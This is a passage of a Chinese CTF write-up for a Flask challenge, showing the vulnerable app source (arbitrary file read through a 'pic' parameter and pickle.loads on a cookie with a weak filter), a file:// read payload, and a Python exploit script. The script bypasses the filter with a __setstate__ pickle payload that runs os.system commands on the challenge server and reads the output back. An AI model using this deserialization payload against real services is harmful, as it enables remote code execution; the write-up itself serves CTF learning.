}

读flag的payload ? /testURL?url=url:file:///flag

2、EZ_python

樱桃猫写了自己的第一个flask网站，你能帮他看看有什么问题吗？

网刃杯的easy_web,原题

文件读取，/proc/self/cmdline

app.py

import pickle
import base64
from flask import Flask, request
from flask import render_template,redirect,send_from_directory
import os
import requests
import random
from flask import send_file


app = Flask(__name__)


class User():
  def __init__(self,name,age):
      self.name = name
      self.age = age


def check(s):
  if b'R' in s:
      return 0
  return 1




@app.route("/")
def index():
  try:
      user = base64.b64decode(request.cookies.get('user'))
      if check(user):
          user = pickle.loads(user)
          username = user["username"]
      else:
          username = "bad,bad,hacker"
  except:
      username = "CTFer"
  pic = '{0}.jpg'.format(random.randint(1,7))
   
  try:
      pic=request.args.get('pic')
      with open(pic, 'rb') as f:
          base64_data = base64.b64encode(f.read())
          p = base64_data.decode()
  except:
      pic='{0}.jpg'.format(random.randint(1,7))
      with open(pic, 'rb') as f:
          base64_data = base64.b64encode(f.read())
          p = base64_data.decode()


  return render_template('index.html', uname=username, pic=p )




if __name__ == "__main__":
  app.run('0.0.0.0',port=8888)

读 /proc/self/environ 没用

MAIL=/var/mail/appUSER=appHOSTNAME=engine-1SHLVL=1PYTHON_PIP_VERSION=20.1HOME=/home/appGPG_KEY=E3FF2839C048B25C084DEBE9B26995E310250568LOGNAME=app_=/bin/suPYTHON_GET_PIP_URL=https://github.com/pypa/get-pip/raw/1fe530e9e3d800be94e04f6428460fc4fb94f5a9/get-pip.pyTERM=xtermPATH=/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binLANG=C.UTF-8SHELL=/bin/shPYTHON_VERSION=3.8.2PWD=/appPYTHON_GET_PIP_SHA256=ce486cddac44e99496a702aa5c06c5028414ef48fdfd5242cd2fe559b13d4348

http://www.snowywar.top/?p=2538 网刃原题

import requests
import pickle
import base64




# e = 'ls / -a'
e = 'cat /flagggggggggggggaaa'
s = pickle.dumps(e)
# print(s)
payload = b'c__main__\nUser\n)\x81}(V__setstate__\ncos\nsystem\nubV' + \
  e.encode()+b' > /tmp/1.txt\nb.'
response = requests.get("http://eci-2zecbk1aefg5marnfo77.cloudeci1.ichunqiu.com:8888/?pic=/tmp/1.txt",
cookies=dict(
  user=base64.b64encode(payload).decode()))
for l in response.content.decode().split("\n"):
  if "base64" in l:
      l = l.split("\"")[1].split(",")[1]
      print(base64.b64decode(l).decode())

flag{2e4af838-7d23-4b04-a77a-1519e8b14e8f}

推荐实操：CTF实验室

https://www.hetianlab.com/pages/CTFLaboratory.jsp?pk_campaign=weixin-wemedia#stu(复制链接至PC端体验吧！)

戳“阅读原文”体验免费靶场！

[Python知识库]长城杯线上赛WP